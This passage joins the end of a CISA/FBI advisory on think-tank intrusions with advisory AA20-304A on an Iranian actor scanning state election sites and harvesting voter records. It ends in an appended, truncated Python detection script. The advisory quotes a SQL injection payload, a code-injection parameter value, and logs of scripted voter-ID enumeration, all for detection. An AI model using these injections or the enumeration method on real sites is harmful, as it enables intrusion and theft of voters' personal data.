href="https://attack.mitre.org/versions/v7/techniques/T1055/012">T1055.012</a>]</li> <li><i>Exploitation for Privilege Escalation</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1068">T1068</a>]</li> <li><i>Access Token Manipulation: Token Impersonation/Theft</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1134/001">T1134.001</a>]</li> <li><i>Event Triggered Execution: Accessibility Features </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1546/008">T1546.008</a>]</li> <li><i>Boot or Logon Autostart Execution: Shortcut Modification</i> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1547/009">T1547.009</a>]</li> <li><i>Abuse Elevation Control Mechanism: Bypass User Access Control</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1548/002">T1548.002</a>]</li> <li><i>Hijack Execution Flow: DLL Side-Loading</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1574/002">T1574.002</a>]</li> </ul> </li> <li><i><em><strong>Defense Evasion</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0005">TA0005</a>] <ul> <li><i>Rootkit</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1014">T1014</a>]</li> <li><i>Obfuscated Files or Information: Binary Padding </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/001">T1027.001</a>]</li> <li><i>Obfuscated Files or Information: Software Packing </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/002">T1027.002</a>]</li> <li><i>Obfuscated Files or Information: Steganography</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1027/003">T1027.003</a>]</li> <li><i>Obfuscated Files or Information: Indicator Removal from Tools</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1027/005">T1027.005</a>]</li> <li><i>Masquerading: Match Legitimate Name or Location</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1036/005">T1036.005</a>]</li> <li><i>Indicator Removal on Host: Clear Windows Event Logs</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/001">T1070.001</a>]</li> <li><i>Indicator Removal on Host: Clear Command History</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/003">T1070.003</a>]</li> <li><i>Indicator Removal on Host: File Deletion</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/004">T1070.004</a>]</li> <li><i>Indicator Removal on Host: Timestomp</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/006">T1070.006</a>]</li> <li><i>Modify Registry</i> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1112">T1112</a>]</li> <li><i>Deobfuscate/Decode Files or Information </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1140">T1140</a>]</li> <li><i>Exploitation for Defense Evasion</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1211">T1211</a>]</li> <li><i>Signed Binary Proxy Execution: Compiled HTML File</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1218/001">T1218.001</a>]</li> <li><i><em>Signed Binary Proxy Execution: Mshta</em></i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1218/005">T1218.005</a>]</li> <li><i>Signed Binary Proxy Execution:<em> Rundll32 </em></i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1218/011">T1218.011</a>]</li> <li><i>Template Injection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1221">T1221</a>]</li> <li><i>Execution Guardrails: Environmental Keying</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1480/001">T1480.001</a>]</li> <li><i>Abuse Elevation Control Mechanism: Bypass User Access Control</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1548/002">T1548.002</a>]</li> <li><i>Use Alternate Authentication Material: Application Access Token</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1550/001">T1550.001</a>]</li> <li><i>Subvert Trust Controls: Code Signing</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1553/002">T1553.002</a>]</li> <li><i>Impair Defenses: Disable or Modify Tools</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1562/001">T1562.001</a>]</li> <li><i>Impair Defenses: Disable or Modify System Firewall</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1562/004">T1562.004</a>]</li> <li><i>Hide Artifacts: Hidden Files and Directories </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1564/001">T1564.001</a>]</li> <li><i>Hide Artifacts: Hidden Window</i> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1564/003">T1564.003</a>]</li> </ul> </li> <li><i><em><strong>Credential Access</strong></em> </i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0006">TA0006</a>] <ul> <li><i>OS Credential Dumping: LSASS Memory</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/001">T1003.001</a>]</li> <li><i>OS Credential Dumping: Security Account Manager </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1003/002">T1003.002</a>]</li> <li><i>OS Credential Dumping: NTDS</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/003">T1003.003</a>]</li> <li><i>OS Credential Dumping: LSA Secrets</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/004">T1003.004</a>]</li> <li><i>OS Credential Dumping: Cached Domain Credentials</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/005">T1003.005</a>]</li> <li><i>Network Sniffing</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1040">T1040</a>]</li> <li><i>Input Capture: Keylogging</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001">T1056.001</a>]</li> <li><i>Brute Force: Password Cracking</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110/002">T1110.002</a>]</li> <li><i>Brute Force: Password Spraying</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110/003">T1110.003</a>]</li> <li><i>Forced Authentication</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1187">T1187</a>]</li> <li><i>Steal Application Access Token</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1528">T1528</a>]</li> <li><i>Unsecured Credentials: Credentials in Files</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1552/001">T1552.001</a>]</li> <li><i>Unsecured Credentials: Group Policy Preferences</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1552/006">T1552.006</a>]</li> <li><i>Credentials from Password Stores: Credentials 
from Web Browsers</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/003">T1555.003</a>]</li> </ul> </li> <li><i><em><strong>Discovery</strong></em> </i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0007">TA0007</a>] <ul> <li><i>System Service Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1007">T1007</a>]</li> <li><i>Query Registry</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1012">T1012</a>]</li> <li><i>System Network Configuration Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1016">T1016</a>]</li> <li><i>Remote System Discovery </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1018">T1018</a>]</li> <li><i>System Owner/User Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1033">T1033</a>]</li> <li><i>Network Sniffing</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1040">T1040</a>]</li> <li><i>Network Service Scanning</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1046">T1046</a>]</li> <li><i>System Network Connections Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1049">T1049</a>]</li> <li><i>Process Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1057">T1057</a>]</li> <li><i>Permission Groups Discovery: Local Groups</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1069/001">T1069.001</a>]</li> <li><i>Permission Groups Discovery: Domain Groups</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1069/002">T1069.002</a>]</li> <li><i>System Information Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1082">T1082</a>]</li> <li><i>File and Directory Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1083">T1083</a>]</li> <li><i>Account Discovery: Local Account</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1087/001">T1087.001</a>]</li> <li><i>Account Discovery: Domain 
Account</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1087/002">T1087.002</a>]</li> <li><i>Peripheral Device Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1120">T1120</a>]</li> <li><i>Network Share Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1135">T1135</a>]</li> <li><i>Password Policy Discovery </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1201/">T1201</a>]</li> <li><i>Software Discovery: Security Software Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1518/001">T1518.001</a>]</li> </ul> </li> <li><i><em><strong>Lateral Movement </strong></em></i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0008">TA0008</a>] <ul> <li><i>Remote Services: Remote Desktop Protocol</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1021/001">T1021.001</a>]</li> <li><i>Remote Services: SSH </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1021/004">T1021.004</a>]</li> <li><i>Taint Shared Content </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1080/">T1080</a>]</li> <li><i>Replication Through Removable Media </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1091">T1091</a>]</li> <li><i>Exploitation of Remote Services</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1210">T1210</a>]</li> <li><i>Use Alternate Authentication Material: Pass the Hash </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1550/002">T1550.002</a>]</li> <li><i>Use Alternate Authentication Material: Pass the Ticket</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1550/003">T1550.003</a>]</li> </ul> </li> <li><i><em><strong>Collection</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0009">TA0009</a>] <ul> <li><i>Data from Local System</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1005">T1005</a>]</li> <li><i>Data from Removable Media</i> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1025">T1025</a>]</li> <li><i>Data Staged: Local Data Staging</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1074/001">T1074.001</a>]</li> <li><i>Screen Capture</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1113">T1113</a>]</li> <li><i>Email Collection: Local Email Collection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1114/001">T1114.001</a>]</li> <li><i>Email Collection: Remote Email Collection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1114/002">T1114.002</a>]</li> <li><i>Automated Collection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1119">T1119</a>]</li> <li><i>Audio Capture</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1123">T1123</a>]</li> <li><i>Data from Information Repositories: SharePoint </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1213/002">T1213.002</a>]</li> <li><i>Archive Collected Data: Archive via Utility</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1560/001">T1560.001</a>]</li> <li><i>Archive Collected Data: Archive via Custom Method</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1560/003">T1560.003</a>]</li> </ul> </li> <li><i><em><strong>Command and Control</strong></em> </i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0011">TA0011</a>] <ul> <li><i>Data Obfuscation: Junk Data</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1001/001/">T1001.001</a>]</li> <li><i>Fallback Channels</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1008">T1008</a>]</li> <li><i>Application Layer Protocol: Web Protocols</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/001">T1071.001</a>]</li> <li><i>Application Layer Protocol: File Transfer Protocols</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/002">T1071.002</a>]</li> <li><i>Application Layer Protocol: Mail Protocols</i> [<a 
href="https://attack.mitre.org/versions/v7/techniques/T1071/003">T1071.003</a>]</li> <li><i>Application Layer Protocol: DNS</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/004">T1071.004</a>]</li> <li><i>Proxy: External Proxy</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1090/002">T1090.002</a>]</li> <li><i>Proxy: Multi-hop Proxy</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1090/003">T1090.003</a>]</li> <li><i>Proxy: Domain Fronting</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1090/004">T1090.004</a>]</li> <li><i>Communication Through Removable Media</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1092">T1092</a>]</li> <li><i>Non-Application Layer Protocol</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1095">T1095</a>]</li> <li><i>Web Service: Dead Drop Resolver</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1102/001">T1102.001</a>]</li> <li><i>Web Service: Bidirectional Communication</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1102/002">T1102.002</a>]</li> <li><i>Multi-Stage Channels</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1104">T1104</a>]</li> <li><i>Ingress Tool Transfer</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1105">T1105</a>]</li> <li><i>Data Encoding: Standard Encoding</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1132/001">T1132.001</a>]</li> <li><i>Remote Access Software</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1219">T1219</a>]</li> <li><i>Dynamic Resolution: Domain Generation Algorithms</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1568/002">T1568.002</a>]</li> <li><i>Non-Standard Port</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1571">T1571</a>]</li> <li><i>Protocol Tunneling</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1572">T1572</a>]</li> <li><i>Encrypted Channel: Symmetric 
Cryptography</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1573/001">T1573.001</a>]</li> <li><i>Encrypted Channel: Asymmetric Cryptography</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1573/002">T1573.002</a>]</li> </ul> </li> <li><i><em><strong>Exfiltration</strong> </em></i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0010">TA0010</a>] <ul> <li><i>Exfiltration Over C2 Channel</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1041">T1041</a>]</li> <li><i>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1048/003">T1048.003</a>]</li> </ul> </li> <li><i><em><strong>Impact </strong></em></i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0040">TA0040</a>] <ul> <li><i>Data Encrypted for Impact</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1486">T1486</a>]</li> <li><i>Resource Hijacking</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1496">T1496</a>]</li> <li><i>System Shutdown/Reboot</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1529">T1529</a>]</li> <li><i>Disk Wipe: Disk Structure Wipe</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1561/002">T1561.002</a>]</li> </ul> </li> </ul> <h3>Mitigations</h3><p>CISA and FBI recommend think tank organizations apply the following critical practices to strengthen their security posture.</p> <h4>Leaders</h4> <ul> <li>Implement a training program to familiarize users with identifying social engineering techniques and phishing emails.</li> </ul> <h4>Users/Staff</h4> <ul> <li>Log off remote connections when not in use.</li> <li>Be vigilant against tailored spearphishing attacks targeting corporate and personal accounts (including both email and social media accounts).</li> <li>Use different passwords for corporate and personal accounts.</li> <li>Install 
antivirus software on personal devices to automatically scan and quarantine suspicious files.</li> <li>Employ strong multi-factor authentication for personal accounts, if available.</li> <li>Exercise caution when: <ul> <li>Opening email attachments, even if the attachment is expected and the sender appears to be known. See <a href="https://www.us-cert.gov/ncas/tips/ST04-010">Using Caution with Email Attachments</a>.</li> <li>Using removable media (e.g., USB thumb drives, external drives, CDs).</li> </ul> </li> </ul> <h4>IT Staff/Cybersecurity Personnel</h4> <ul> <li>Segment and segregate networks and functions.</li> <li>Change the default username and password of applications and appliances.</li> <li>Employ strong multi-factor authentication for corporate accounts.</li> <li>Deploy antivirus software on organizational devices to automatically scan and quarantine suspicious files.</li> <li>Apply encryption to data at rest and data in transit.</li> <li>Use email security appliances to scan and remove malicious email attachments or links.</li> <li>Monitor key internal security tools and identify anomalous behavior. Flag any known indicators of compromise or threat actor behaviors for immediate response.</li> <li>Organizations can implement mitigations of varying complexity and restrictiveness to reduce the risk posed by threat actors who use Tor (The Onion Router) to carry out malicious activities. See the CISA-FBI Joint Cybersecurity Advisory on <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-183a">Defending Against Malicious Cyber Activity Originating from Tor</a> for mitigation options and additional information.</li> <li>Prevent exploitation of known software vulnerabilities by routinely applying software patches and upgrades. Foreign cyber threat actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations. 
If these vulnerabilities are left unpatched, exploitation often requires few resources and provides threat actors with easy access to victim networks. Review CISA and FBI’s <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a">Top 10 Routinely Exploited Vulnerabilities</a> and other CISA alerts that identify vulnerabilities exploited by foreign attackers.</li> <li>Implement an antivirus program and a formalized patch management process.</li> <li>Block certain websites and email attachments commonly associated with malware (e.g., .scr, .pif, .cpl, .dll, .exe).</li> <li>Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).</li> <li>Implement Group Policy Object and firewall rules.</li> <li>Implement filters at the email gateway and block suspicious IP addresses at the firewall.</li> <li>Routinely audit domain and local accounts as well as their permission levels to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.</li> <li>Follow best practices for design and administration of the network to limit privileged account use across administrative tiers.</li> <li>Implement a Domain-Based Message Authentication, Reporting &amp; Conformance (DMARC) validation system.</li> <li>Disable or block unnecessary remote services.</li> <li>Limit access to remote services through centrally managed concentrators.</li> <li>Deny direct remote access to internal systems or resources by using network proxies, gateways, and firewalls.</li> <li>Limit unnecessary lateral communications.</li> <li>Disable file and printer sharing services. 
If these services are required, use strong passwords or Active Directory authentication.</li> <li>Ensure applications do not store sensitive data or credentials insecurely.</li> <li>Enable a firewall on agency workstations, configured to deny unsolicited connection requests.</li> <li>Disable unnecessary services on agency workstations and servers.</li> <li>Scan for and remove suspicious email attachments; ensure any scanned attachment is its "true file type" (i.e., the extension matches the file header).</li> <li>Monitor users' web browsing habits; restrict access to suspicious or risky sites. Contact law enforcement or CISA immediately regarding any unauthorized network access identified.</li> <li>Visit the MITRE ATT&amp;CK techniques and tactics pages linked in the ATT&amp;CK Profile section above for additional mitigation and detection strategies for this malicious activity targeting think tanks.</li> </ul> <h3>Contact Information</h3><p>Recipients of this report are encouraged to contribute any additional information that they may have related to this threat. To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.gov">Central@cisa.gov</a>.</p> <h3>References</h3> <ul> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-120a">CISA Alert: Microsoft Office 365 Security Recommendations</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">CISA Alert: Technical Approaches to Uncovering and Remediating Malicious Activity</a></li> <li><a href="https://www.cisa.gov/telework">CISA Webpage: Telework Guidance</a></li> <li><a href="https://www.cisa.gov/vpn-related-guidance">CISA Webpage: VPN-Related Guidance</a></li> <li><a href="http://image.communications.cyber.nj.gov/lib/fe3e15707564047c7c1270/m/2/PIN+-+4.9.2020.pdf">FBI Private Industry Notification: PIN 20200409-001</a></li> </ul> <h3>References</h3> <ul> <li><a href="https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/">[1] CyberScoop: As Europe prepares to vote, Microsoft warns of Fancy Bear attacks on democratic think tanks</a></li> </ul> <h3>Revisions</h3> <ul> <li>Initial Version: December 1, 2020</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
October 30, 2020

AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data

Original release date: October 30, 2020
Summary

This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). CISA and the FBI are aware of an Iranian advanced persistent threat (APT) actor targeting U.S. state websites—to include election websites. CISA and the FBI assess this actor is responsible for the mass dissemination of voter intimidation emails to U.S. citizens and the dissemination of U.S. election-related disinformation in mid-October 2020. This disinformation (hereinafter, “the propaganda video”) was in the form of a video purporting to misattribute the activity to a U.S. domestic actor and implies that individuals could cast fraudulent ballots, even from overseas. (See https://www.odni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security; reference FBI FLASH message ME-000138-TT, disseminated October 29, 2020.) Further evaluation by CISA and the FBI has identified the targeting of U.S. state election websites was an intentional effort to influence and interfere with the 2020 U.S. presidential election.


Technical Details

Analysis by CISA and the FBI indicates this actor scanned state websites, to include state election websites, between September 20 and September 28, 2020, with the Acunetix vulnerability scanner (Active Scanning: Vulnerability Scanning [T1595.002]). Acunetix is a widely used and legitimate web scanner, which has been used by threat actors for nefarious purposes. Organizations that do not regularly use Acunetix should monitor their logs for any activity from the program that originates from IP addresses provided in this advisory and consider it malicious reconnaissance behavior. 

Additionally, CISA and the FBI observed this actor attempting to exploit websites to obtain copies of voter registration data between September 29 and October 17, 2020 (Exploit Public-Facing Application [T1190]). This includes attempted exploitation of known vulnerabilities, directory traversal, Structured Query Language (SQL) injection, web shell uploads, and leveraging unique flaws in websites. 

CISA and the FBI can confirm that the actor successfully obtained voter registration data in at least one state. The access of voter registration data appeared to involve the abuse of website misconfigurations and a scripted process using the cURL tool to iterate through voter records. A review of the records that were copied and obtained reveals the information was used in the propaganda video. 

CISA and FBI analysis of identified activity against state websites, including state election websites, referenced in this product cannot all be fully attributed to this Iranian APT actor. FBI analysis of the Iranian APT actor’s activity has identified targeting of U.S. elections’ infrastructure (Compromise Infrastructure [T1584]) within a similar timeframe, use of IP addresses and IP ranges – including numerous virtual private network (VPN) service exit nodes – which correlate to this Iranian APT actor (Gather Victim Host Information [T1592]), and other investigative information. 

Reconnaissance

The FBI has information indicating this Iran-based actor attempted to access PDF documents from state voter sites using advanced open-source queries (Search Open Websites and Domains [T1539]). The actor demonstrated interest in PDFs hosted on URLs with the words “vote” or “voter” and “registration.” The FBI identified queries of URLs for election-related sites. 

The FBI also has information indicating the actor researched the following information in a suspected attempt to further their efforts to survey and exploit state election websites.

  • YOURLS exploit
  • Bypassing ModSecurity Web Application Firewall
  • Detecting Web Application Firewalls
  • SQLmap tool

Acunetix Scanning

CISA’s analysis identified the scanning of multiple entities by the Acunetix Web Vulnerability scanning platform between September 20 and September 28, 2020 (Active Scanning: Vulnerability Scanning [T1595.002]). 

The actor used the scanner to attempt SQL injection into various fields in /registration/registration/details with status codes 404 or 500:

/registration/registration/details?addresscity=-1 or 3*2<(0+5+513-513) -- &addressstreet1=xxxxx&btnbeginregistration=begin voter registration&btnnextelectionworkerinfo=next&btnnextpersonalinfo=next&btnnextresdetails=next&btnnextvoterinformation=next&btnsubmit=submit&chkageverno=on&chkageveryes=on&chkcitizenno=on&chkcitizenyes=on&chkdisabledvoter=on&chkelectionworker=on&chkresprivate=1&chkstatecancel=on&dlnumber=1&dob=xxxx/x/x&email=sample@email.tst&firstname=xxxxx&gender=radio&hdnaddresscity=&hdngender=&last4ssn=xxxxx&lastname=xxxxxinjjeuee&mailaddresscountry=sample@xxx.xxx&mailaddressline1=sample@email.tst&mailaddressline2=sample@xxx.xxx&mailaddressline3=sample@xxx.xxx&mailaddressstate=aa&mailaddresszip=sample@xxxx.xxx&mailaddresszipex=sample@xxx.xxx&middlename=xxxxx&overseas=1&partycode=a&phoneno1=xxx-xxx-xxxx&phoneno2=xxx-xxx-xxxx&radio=consent&statecancelcity=xxxxxxx&statecancelcountry=usa&statecancelstate=XXaa&statecancelzip=xxxxx&statecancelzipext=xxxxx&suffixname=esq&txtmailaddresscity=sample@xxx.xxx

Requests

The actor used the following requests associated with this scanning activity.

2020-09-26 13:12:56 x.x.x.x GET /x/x v[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 0

2020-09-26 13:13:19 X.X.x.x GET /x/x voterid[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 1375

2020-09-26 13:13:18 .X.x.x GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 - X.X.x.x 

User Agents Observed

CISA and FBI have observed the following user agents associated with this scanning activity.

Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0 

Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4 

Mozilla/5.0+(X11;+U;+Linux+i686;+en-US;+rv:1.8.1.17)+Gecko/20080922+Ubuntu/7.10+(gutsy)+Firefox/2.0.0.17

Exfiltration

Obtaining Voter Registration Data

Following the review of web server access logs, CISA analysts, in coordination with the FBI, found instances of the cURL and FDM User Agents sending GET requests to a web resource associated with voter registration data. The activity occurred between September 29 and October 17, 2020. Suspected scripted activity submitted several hundred thousand queries iterating through voter identification values, and retrieving results with varying levels of success [Gather Victim Identity Information (T1589)]. A sample of the records identified by the FBI reveals they match information in the aforementioned propaganda video.

Requests

The actor used the following requests.

2020-10-17 13:07:51 x.x.x.x GET /x/x voterid=XXXX1 443 - x.x.x.x curl/7.55.1 - 200 0 0 1406

2020-10-17 13:07:55 x.x.x.x GET /x/x voterid=XXXX2 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390

2020-10-17 13:07:58 x.x.x.x GET /x/x voterid=XXXX3 443 - x.x.x.x curl/7.55.1 - 200 0 0 1625

2020-10-17 13:08:00 x.x.x.x GET /x/x voterid=XXXX4 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390

Note: incrementing voterid values in cs_uri_query field

User Agents

CISA and FBI have observed the following user agents.

FDM+3.x

curl/7.55.1

Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0

Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4

See figure 1 below for a timeline of the actor’s malicious activity.

Figure 1: Overview of malicious activity

Mitigations

Detection

Acunetix Scanning

Organizations can identify Acunetix scanning activity by using the following keywords while performing log analysis.

  • $acunetix
  • acunetix_wvs_security_test
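The keyword check above and the incrementing-voterid enumeration described under Exfiltration, as an added example that is not part of the advisory: it assumes IIS W3C extended logs in the field order of the advisory's sample lines, and the log lines it runs over are constructed.

```python
"""Added example: log analytics for the two behaviours this advisory describes.
Assumes IIS W3C extended logging in the field order of the advisory's samples.
The log lines below are constructed, not real traffic."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Optional

# Field order of the sample log lines in the advisory (IIS W3C extended defaults).
IIS_FIELDS = [
    "date", "time", "s_ip", "cs_method", "cs_uri_stem", "cs_uri_query",
    "s_port", "cs_username", "c_ip", "cs_user_agent", "cs_referer",
    "sc_status", "sc_substatus", "sc_win32_status", "time_taken",
]

# Keywords the advisory lists for spotting Acunetix scanning in logs.
ACUNETIX_MARKERS = ("$acunetix", "acunetix_wvs_security_test")

# User-agent prefixes seen in the record-enumeration phase (cURL and Free
# Download Manager); the Acunetix requests carried ordinary browser agents.
SCRIPTED_AGENT_PREFIXES = ("curl/", "FDM+")

# voterid values in the advisory are partly redacted ("XXXX1"), so allow an
# alphabetic prefix and key on the trailing digits.
VOTERID_RE = re.compile(r"(?:^|&)voterid=([A-Za-z]*)(\d+)(?:&|$)")


def parse_iis_line(line: str) -> Optional[Dict[str, str]]:
    """Split one W3C log line into named fields; skip directives and short lines."""
    parts = line.split()
    if not parts or parts[0].startswith("#") or len(parts) != len(IIS_FIELDS):
        return None
    return dict(zip(IIS_FIELDS, parts))


def find_acunetix_hits(lines: Iterable[str]) -> List[Dict[str, str]]:
    """One finding per (line, marker) where an Acunetix keyword appears in the URI."""
    hits = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        uri = rec["cs_uri_stem"] + "?" + rec["cs_uri_query"]
        for marker in ACUNETIX_MARKERS:
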